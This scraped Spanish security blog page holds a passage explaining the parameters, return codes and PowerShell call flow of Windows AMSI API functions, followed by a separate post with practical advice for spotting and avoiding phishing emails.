<div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggO0BOEkykLsO4g7YVsQvVWGmV8hagsFmdsQjDpItnrcmeTw3R_KB4ndIHcGj51HnN4Px8OTiANoDKrOvLigBZsqMrte3ajIRwrdEQ2ooDXf-IaZ1tg0T2eOoKfJkhNoVrKncjQQMutYRGQGe5kXJRNBWFYKntMShyxM1osVDpw81FWZPDo30BETj61P7L/s567/Zerolynx_Blog_FluProject_AMSIInitialize%20(1).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="97" data-original-width="567" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggO0BOEkykLsO4g7YVsQvVWGmV8hagsFmdsQjDpItnrcmeTw3R_KB4ndIHcGj51HnN4Px8OTiANoDKrOvLigBZsqMrte3ajIRwrdEQ2ooDXf-IaZ1tg0T2eOoKfJkhNoVrKncjQQMutYRGQGe5kXJRNBWFYKntMShyxM1osVDpw81FWZPDo30BETj61P7L/w640-h110/Zerolynx_Blog_FluProject_AMSIInitialize%20(1).png" width="640" /></span></a></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La documentación de Microsoft nos dice que esta función
recibe dos parámetros:</span></div><p class="MsoNormal" style="text-align: justify;"></p><p style="text-align: left;"></p><p></p><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed; text-indent: -18pt;">El primer parámetro es el nombre de la
aplicación que va a utilizar la DLL, que en nuestro caso va a ser PowerShell.</span></li></ul><p></p><ul><li><span style="font-family: Barlow Semi Condensed;">El segundo parámetro es un puntero vacío llamado
amsiContext. Este puntero será rellenado por la función AmsiInitialize y será
utilizado con el resto de las funciones. </span></li></ul><p></p><p style="text-align: left;"></p>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tanto en esta función como en la mayoría de las funciones de
AMSI se devuelve HRESULT, que es un código que representa si la función se ha
ejecutado de forma exitosa o no. La lista de códigos podemos verla en la
documentación de <a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/705fb797-2175-4a90-b5a3-3918024b10b8">Microsoft</a>.
</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La siguiente función es AmsiOpenSession. Cada vez que se
ejecuta un comando PowerShell, es necesario crear una sesión con AMSI, por lo
que se llamará a esta función.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_OOpkSlN0pB3DWgr4sfW75NLncqR73PkAJ2YD9XrfZOhh6a4Hcn7JbIAQCmRC8ktoj1W8SR4yecTo1n1CBBTbu8MyshBlKtV-ug88TZJ3wwWAbC0pOkpY0qBItDuewXgoBP2XO5-RCOMja7JsKo2HUo0adB3tbROQTab0VE3nuKKktrx9qo0AFZT5O3TN/s509/Zerolynx_Blog_FluProject_AMSIOpenSession%20(2).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="93" data-original-width="509" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_OOpkSlN0pB3DWgr4sfW75NLncqR73PkAJ2YD9XrfZOhh6a4Hcn7JbIAQCmRC8ktoj1W8SR4yecTo1n1CBBTbu8MyshBlKtV-ug88TZJ3wwWAbC0pOkpY0qBItDuewXgoBP2XO5-RCOMja7JsKo2HUo0adB3tbROQTab0VE3nuKKktrx9qo0AFZT5O3TN/w640-h116/Zerolynx_Blog_FluProject_AMSIOpenSession%20(2).png" width="640" /></span></a></div><div style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La documentación de Microsoft nos dice que esta función
también recibe dos parámetros:</span></div><p></p><p></p><p></p><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed; text-align: left;">El primer argumento es amsiContext, que equivale
al contexto que se ha rellenado en la anterior función.</span></li></ul><p></p><p></p><p></p><p></p><ul style="text-align: left;"><li><span style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">El segundo argumento es un puntero vacío llamado
amsiSession. Este puntero será rellenado por la función AmsiOpenSession y será
utilizado por otras funciones.</span></span></li></ul><p></p><p></p><p></p><p></p><p style="text-align: left;"></p>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Al igual que AmsiInitialize, devuelve un código que
representa si la función se ha ejecutado de forma exitosa o no. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En tercer lugar, tenemos AmsiScanString y AmsiScanBuffer.
Ambas funciones tienen el mismo cometido y la forma de utilizarse es bastante
similar. Tanto es así, que en realidad AmsiScanString llama por debajo a
AmsiScanBuffer. La labor de estas funciones es capturar el contenido de un
comando para que posteriormente lo escanee el AV/EDR.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq1r0T_HgQNnDUaTD-dsM7aQof2awcMPRMnZ47YzgcPeICX8kdx1IjRIpjO8dmPpNOEOnRj3oSMeZzDa6RfVSDJom8F2tBpB4AtyBHAycuZsjc1XEWCrgoeDGcI6txM2JvVm7GEp78W7aeMUs6ABcgQI9xrV4Fi7dpLyxmVwYlukUvVGZRsNMSKmZKmC2D/s422/Zerolynx_Blog_FluProject_AMSIScanString%20(3).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="146" data-original-width="422" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq1r0T_HgQNnDUaTD-dsM7aQof2awcMPRMnZ47YzgcPeICX8kdx1IjRIpjO8dmPpNOEOnRj3oSMeZzDa6RfVSDJom8F2tBpB4AtyBHAycuZsjc1XEWCrgoeDGcI6txM2JvVm7GEp78W7aeMUs6ABcgQI9xrV4Fi7dpLyxmVwYlukUvVGZRsNMSKmZKmC2D/w640-h222/Zerolynx_Blog_FluProject_AMSIScanString%20(3).png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><p class="MsoNormal" style="text-align: center;"><span style="font-family: Barlow Semi Condensed;"><o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJYWWuqmyjnt79T91PW6_LCl5PaNflSIrwy8PQA9mce1hFk3dz1opBUOuUUEf4QkDLvXKhenIzI9SQ3nQPr6heZmavWjarUpTfmrmiQbs_-dpGQvnIDgRw89YjWQxVjGUsYGIQCFa8uIWnM3QlzrW1A75E-CXH8-OG9d7nYc7UI3V-hw5utXMFwaogebxW/s421/Zerolynx_Blog_FluProject_AMSIScanBuffer%20(4).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="153" data-original-width="421" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJYWWuqmyjnt79T91PW6_LCl5PaNflSIrwy8PQA9mce1hFk3dz1opBUOuUUEf4QkDLvXKhenIzI9SQ3nQPr6heZmavWjarUpTfmrmiQbs_-dpGQvnIDgRw89YjWQxVjGUsYGIQCFa8uIWnM3QlzrW1A75E-CXH8-OG9d7nYc7UI3V-hw5utXMFwaogebxW/w640-h232/Zerolynx_Blog_FluProject_AMSIScanBuffer%20(4).png" width="640" /></span></a></div><p style="clear: both; text-align: justify;"></p><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">La documentación de Microsoft nos
dice que AmsiScanString recibe cinco parámetros:</span></div><p style="text-align: left;"></p><p></p><ul style="text-align: left;"><li><span style="text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;">El primer argumento representa contexto que ha rellenado
la primera función (AmsiInitialize).</span></span></li></ul><p></p><p></p><p></p><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">El segundo argumento es un string, que
representa el contenido del comando.</span></li></ul><p></p><p></p><p></p><p></p><ul style="text-align: left;"><li><span style="text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;">El tercer argumento es una especie de
identificador.</span></span></li></ul><p></p><p></p><p></p><ul style="text-align: left;"><li><span style="font-family: Barlow Semi Condensed;">El cuarto argumento es la sesión, que como hemos
visto previamente, se ha rellenado en la función AmsiOpenSession.</span></li></ul><p></p><p></p><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><span style="text-align: left; text-indent: -18pt;">Por último, con el quinto argumento la función
recibe un puntero vacío que va a representar el resultado del escaneo (es
decir, si el AV/EDR dice que es malware o no). Los valores pueden ser los
siguientes:</span><span style="mso-tab-count: 1; text-align: left; text-indent: -18pt;"> </span></span></li></ul><p></p><p></p><p></p><p></p><p></p><p class="MsoNormal" style="text-align: justify;"></p><p></p>
<p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPNg-DMNeL3K3YU1wYm4XWTd8ZuWrH9DX2x0FDRZY7YloVRYeJO8M8l32JkTVxUkDbvyKsTA6aAAX1_2TtyA-wuLNgL82XfiEMU668WsEFEx0F-YSxBLj8BVIIyPmJ0CgrFuhUE5R50ogP9C9NITYntIdLsxnxFrXnFi2_6zqhDltKyn7hEcA1g_4k7xws/s360/Zerolynx_Blog_FluProject_AMSI_Typedef%20(5).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="149" data-original-width="360" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPNg-DMNeL3K3YU1wYm4XWTd8ZuWrH9DX2x0FDRZY7YloVRYeJO8M8l32JkTVxUkDbvyKsTA6aAAX1_2TtyA-wuLNgL82XfiEMU668WsEFEx0F-YSxBLj8BVIIyPmJ0CgrFuhUE5R50ogP9C9NITYntIdLsxnxFrXnFi2_6zqhDltKyn7hEcA1g_4k7xws/w640-h264/Zerolynx_Blog_FluProject_AMSI_Typedef%20(5).png" width="640" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">Por otro lado, AmsiScanBuffer
recibe, en lugar de un string que va a representar el comando, un buffer.
Además, también es necesario indicar la longitud de ese buffer. Los demás
argumentos son iguales para ambas funciones. </span></div><p style="text-align: left;"></p>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por último, tanto para
AmsiScanString como para AmsiScanBuffer se devuelve HRESULT, que de la misma
forma que en las funciones anteriores, representa si la función se ha ejecutado
correctamente. Cabe destacar que no hay que confundir el resultado del escaneo
con el resultado de la función, que son dos valores completamente diferentes. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A pesar de eso, son valores que
sí que son dependientes entre sí. El contenido de<i> result</i> no puede ser
AMSI_RESULT_DETECTED, si HRESULT es E_INVALIDARG, puesto que esto significaría
que no se ejecutaría el análisis porque los argumentos son inválidos. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pero si por un casual, por algún
tipo de error, el contenido de <i>result</i> representa que existe malware,
pero HRESULT es INVALIDARG, el comando se ejecutará con normalidad, ya que
primero se comprobará HRESULT, y si este indica que se ha ejecutado la función
con normalidad, comprobará el contenido de <i>result.</i></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><i><br /></i></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por último, tenemos la función
AmsiCloseSession, que tiene lugar cuando ya se ha realizado el escaneo. Esta
función se llama también cuando se ejecuta un comando en PowerShell. La tarea
de esta función es cerrar la sesión para que no se pueda volver a utilizar.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheAO_al65u4GD2Lj93olrO_RbLFl0hPASgLfq81qNWTG2ih47vTxkMlVsRxNbr5jx7jTZkKG0ZEfb8vP9RBAEDv3QFbFxfrt-xtQI10YZdZa64ae48sZ6ctyIxE-AP877iXyHiEZA4zQgpEyEgL6ziZvMsXubgRw31g8aGk2SLiob7gavzIVubKrfJT2kO/s427/Zerolynx_Blog_FluProject_AMSICloseSession%20(6).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="89" data-original-width="427" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheAO_al65u4GD2Lj93olrO_RbLFl0hPASgLfq81qNWTG2ih47vTxkMlVsRxNbr5jx7jTZkKG0ZEfb8vP9RBAEDv3QFbFxfrt-xtQI10YZdZa64ae48sZ6ctyIxE-AP877iXyHiEZA4zQgpEyEgL6ziZvMsXubgRw31g8aGk2SLiob7gavzIVubKrfJT2kO/w640-h134/Zerolynx_Blog_FluProject_AMSICloseSession%20(6).png" width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La documentación de Microsoft nos
dice que recibe dos parámetros:</span></div><p class="MsoNormal" style="text-align: justify;"></p><p style="text-align: left;"></p><ul><li><span style="font-family: Barlow Semi Condensed;"><span style="text-indent: -18pt;">El contexto de la inicialización.</span><span style="mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;"><span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal;"> </span></span></span></span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;">La sesión que se quiere cerrar.</span></li></ul><p></p><p style="text-align: left;"></p><p style="text-align: left;"></p><p class="MsoListParagraphCxSpFirst" style="mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><o:p></o:p></span></p>
<p class="MsoListParagraphCxSpLast" style="mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><o:p></o:p></span></p>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Al ser una función <i>void,</i>
no devuelve nada. Es decir, por parte de Microsoft no existe control de errores
para saber si la sesión se ha cerrado con éxito, o ha habido algún tipo de
fallo.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Por lo tanto, cuando abrimos una
PowerShell, el flujo de llamadas a la API sería el siguiente:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div>
<p class="MsoNormal" style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUyk_-FFnNO3_nK6IrCVgsADXezeVOMsQiP1DG88RMmmIo2nzd18e8yTgksoOdcudFRZt4iGwFszjq1USlxz2qKc0YbV3cBBunSvaEqmpIeHco2Qo6qghpqo2hrbSpAS59d6KdRy67mYeub491G9SzITt6hyiRqNq2M3VI8J4fbXjevHSPN1U2TpOKJeG/s567/Zerolynx_Blog_FluProject_AMSIPowerShell%20(7).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="111" data-original-width="567" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJUyk_-FFnNO3_nK6IrCVgsADXezeVOMsQiP1DG88RMmmIo2nzd18e8yTgksoOdcudFRZt4iGwFszjq1USlxz2qKc0YbV3cBBunSvaEqmpIeHco2Qo6qghpqo2hrbSpAS59d6KdRy67mYeub491G9SzITt6hyiRqNq2M3VI8J4fbXjevHSPN1U2TpOKJeG/w640-h126/Zerolynx_Blog_FluProject_AMSIPowerShell%20(7).png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;">
Y en el momento que ya está la PowerShell abierta y ejecutamos comandos, el
flujo de llamadas a la API sería el siguiente:</span></div><div style="text-align: left;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKtwzAJcv952TJ1EwRz08xHKJSYjsODZx6zHb4Xj5YIFQeNw47wt8wu8X7nq6KdToia7CBSLSP4Tt66c9JM5SXcLWcBwgLbI3tgg7jC-ELh0A6ISgLM5wOmZagwoNTJkT3r76F08lqabZysyzCbyv4qaxpXsNdWfdi0d4-DMNSh5UeoYiLJfsr4iK349HH/s567/Zerolynx_Blog_FluProject_AMSIPowerShellAPI%20(8).png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="62" data-original-width="567" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKtwzAJcv952TJ1EwRz08xHKJSYjsODZx6zHb4Xj5YIFQeNw47wt8wu8X7nq6KdToia7CBSLSP4Tt66c9JM5SXcLWcBwgLbI3tgg7jC-ELh0A6ISgLM5wOmZagwoNTJkT3r76F08lqabZysyzCbyv4qaxpXsNdWfdi0d4-DMNSh5UeoYiLJfsr4iK349HH/w640-h70/Zerolynx_Blog_FluProject_AMSIPowerShellAPI%20(8).png" width="640" /></span></a></div><p></p><div style="text-align: justify;"><br /></div><div style="text-align: left;"><span style="background-color: white; color: #212529; font-size: 16px; text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y por hoy,¡ ya está bien!, continuaremos con AMSI en las próximas entregas.</span></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/juan-gabriel-ruiz-fern%C3%A1ndez-16b3181ba/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;" target="_blank">Juan Gabriel Ruiz</a><span face=""open sans", sans-serif" style="background-color: white; color: #212529; font-size: 16px; text-align: right;">, </span><i style="background-color: white; box-sizing: border-box; color: #212529; font-size: 16px; outline: none; text-align: right;">Senior Security Analyst at <a href="https://www.flu-project.com/" style="box-sizing: border-box; color: #1e71b8; cursor: pointer; outline: none; text-decoration-line: none; transition: all 0.5s ease 0s;" target="_blank">Zerolynx</a></i><a href="https://www.flu-project.com/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;" target="_blank"> </a><span face=""open sans", sans-serif" style="background-color: white; color: #212529; font-size: 16px; text-align: right;">y </span><a href="https://www.linkedin.com/in/klego/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Justo Martín</a><span face=""open sans", sans-serif" style="background-color: white; color: #212529; font-size: 16px; text-align: right;">, </span><i style="background-color: white; box-sizing: border-box; color: #212529; font-size: 16px; outline: none; text-align: right;">Security Analyst at <a href="https://www.zerolynx.com/es/" style="box-sizing: border-box; color: #1e71b8; cursor: pointer; outline: none; text-decoration-line: none; transition: all 0.5s ease 0s;">Zerolynx</a></i><span face=""open sans", sans-serif" style="background-color: white; color: #212529; font-size: 16px; text-align: right;">.</span></span></div><div><span face=""open sans", sans-serif" style="background-color: white; color: #212529; font-family: Barlow Semi Condensed; font-size: 16px; text-align: right;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><br /></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-48537322319115255162023-10-02T08:30:00.006+02:002023-11-07T13:12:34.077+01:00Cómo identificar y evitar el Phishing en correos electrónicos<p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNbMZNN_P0W4TRGXIjOfi40negMJOKx1ASTNTJhcWbEeQl1zxMbdlMHTed_P1xzf22LkouHuWkommHVQsLB_bWtk_YnsWmcgNsFieT6gS7bwq3TccROKPDFCmazdc5Wx0F_oXDorlob4UbBkesG6bbbBF-nN__oz251Si6HxGT_e2q25LUv1szNghvCLIW/s1024/ejemplo-phishing2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="478" data-original-width="1024" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNbMZNN_P0W4TRGXIjOfi40negMJOKx1ASTNTJhcWbEeQl1zxMbdlMHTed_P1xzf22LkouHuWkommHVQsLB_bWtk_YnsWmcgNsFieT6gS7bwq3TccROKPDFCmazdc5Wx0F_oXDorlob4UbBkesG6bbbBF-nN__oz251Si6HxGT_e2q25LUv1szNghvCLIW/w640-h298/ejemplo-phishing2.jpg" width="640" /></a></div><p></p><p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;"><br /></span></p><p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">A pesar de ser
una de las técnicas de ingeniería social y ciberataques más comunes en la
actualidad, el <i>phishing</i> sigue siendo un fuerte vector de entrada de
ataque utilizado por muchos ciberdelincuentes. Esta técnica pretende obtener de
manera fraudulenta información personal o empresarial de los usuarios mediante
correos y páginas webs aparentemente fiables, donde dichos usuarios introducen
sus datos confiando en su legitimidad.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;">En un </span><a href="https://www.incibe.es/incibe/sala-de-prensa/incibe-gestiono-mas-115000-incidentes-ciberseguridad-durante-2022-9-mas"><span style="background: white; font-size: 11.5pt; line-height: 107%;">boletín</span></a><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;"> publicado por el Instituto Nacional de Ciberseguridad de
España (INCIBE) respecto al Balance de Ciberseguridad del pasado año 2022, se
gestionaron un total de 118.820 incidentes de ciberseguridad, de los cuales
casi 17.000 incidentes (un 14 % del total) fueron ocasionados por <i>phishing</i>.
No es de extrañar que con la constante digitalización de los servicios y la
ingente cantidad de información que los usuarios manejan en sus dispositivos,
las cifras de <i>phishing</i> se incrementen en 2023.<o:p></o:p></span></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Por todo
ello, es indispensable que exista un adecuado conocimiento en materia de ciberseguridad,
o una serie de pautas a seguir, que ayuden a identificar y evitar ser víctimas
de este tipo de ciberataques.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">En lo
relativo al contenido del correo electrónico recibido, es importante
identificar características que serían determinantes para dicho correo, como
son: remitente que lo envía, dirección de correo electrónico que utiliza (antes
del @), dominio de la dirección de correo electrónico (después del @) o pie de
firma. Si el cuerpo del correo contiene múltiples faltas de ortografía o exige
una urgencia o respuesta inmediatas, son señales de alerta.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Ocasionalmente,
existen ficheros adjuntos al correo en cuestión. Es fundamental desconfiar de
dichos documentos, por lo que hay que evitar su apertura o ejecución en un
principio. Para distinguir si se trata de un archivo legítimo o no, se
recomienda como buena práctica observar tanto el nombre del documento como su
extensión.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Si el
fichero tiene nombres genéricos del tipo “nóminas”, “facturas”, “documentación”
o similares, es un primer punto de partida para sospechar. Normalmente cuando
recibimos archivos adjuntos en un correo electrónico, suelen incluir
características distintivas que ofrecen un mayor detalle; como nombre de la
empresa que lo envía, tema del documento, o año o mes que lo relaciona.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Las prisas nunca son buenas
consejeras, si alguien te pide algo por correo y expone una situación de última
hora o te mete prisas para que accedas a un enlace o hagas algo, desconfía y
llama al peticionario a un teléfono que tengas tú guardado de ocasiones
anteriores, nunca al que indica en el correo.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Por otro
lado, el factor clave de identificación es la extensión. Si se espera recibir
un archivo de una extensión en concreto, hay que asegurarse de que el fichero
adjunto es de ese tipo. Para ello, además de comprobar el icono que lo
identifica, se recomienda activar la visualización de extensiones en el sistema
para verificarlo, también Configurar las aplicaciones para que no se ejecuten <i>macros
</i>de forma automática. Es una buena práctica tener especial precaución con
los archivos que solicitan la habilitación de <i>macros</i> deben ser
descartados, ya que pueden contener comandos que extiendan <i>virus</i> o <i>malware</i>
en el equipo o red.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;">En el caso
de los ficheros ejecutables, hay que tener especial cuidado ya que pueden
contener <i>scripts</i> o instalar contenido en los sistemas que contengan código
malicioso. Para ello, se recomienda utilizar antimalware o herramientas como </span><a href="https://www.virustotal.com/es/"><i><span style="background: white; font-size: 11.5pt; line-height: 107%;">Virustotal</span></i></a><i><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;">,</span></i><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;"> la cual permite analizar
archivos descargados en el equipo previo a ejecutarlos.<o:p></o:p></span></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Adicionalmente,
es posible que en el cuerpo del correo se incluyan enlaces externos a páginas
web, las cuales pueden ser maliciosas. Para evitarlo, se aconseja atender a la
sintaxis de dicho enlace, y, además, nunca hacer clic directamente en éste;
sino en su lugar escribir manualmente la dirección legítima en el navegador. De
esta forma, además de evitar el posible <i>phishing</i> se evitan técnicas como
<i>typosquatting</i> donde se incluyen caracteres o símbolos en el enlace que
pasan desapercibidos a simple vista.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;">Si se
requiere una confirmación adicional del enlace, pueden usarse herramientas como
</span><a href="https://unshorten.me/"><i><span style="background: white; font-size: 11.5pt; line-height: 107%;">unshorten.me</span></i></a><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;"> la cual permite ver un mensaje acortado en su versión
extendida.<o:p></o:p></span></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">En ámbitos
empresariales, se recomienda hacer campañas de <i>phishing</i> simulado con
cierta regularidad con el objetivo de crear concienciación directa en la
plantilla. El beneficio adicional de esta práctica es que permite tomar datos
estadísticos del nivel de riesgo que existe en la empresa frente a ciberataques
de este tipo, y tomar las medidas adecuadas en base a dicho riesgo.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Por último,
se recomienda mantener los sistemas con los antivirus (especialmente con características
de XDR) y aplicaciones actualizadas en su última versión, e instalar filtros <i>antispam,</i>
así como desactivar la vista previa de correos en HTML para las cuentas de
usuario que se consideren críticas.<o:p></o:p></span></p>
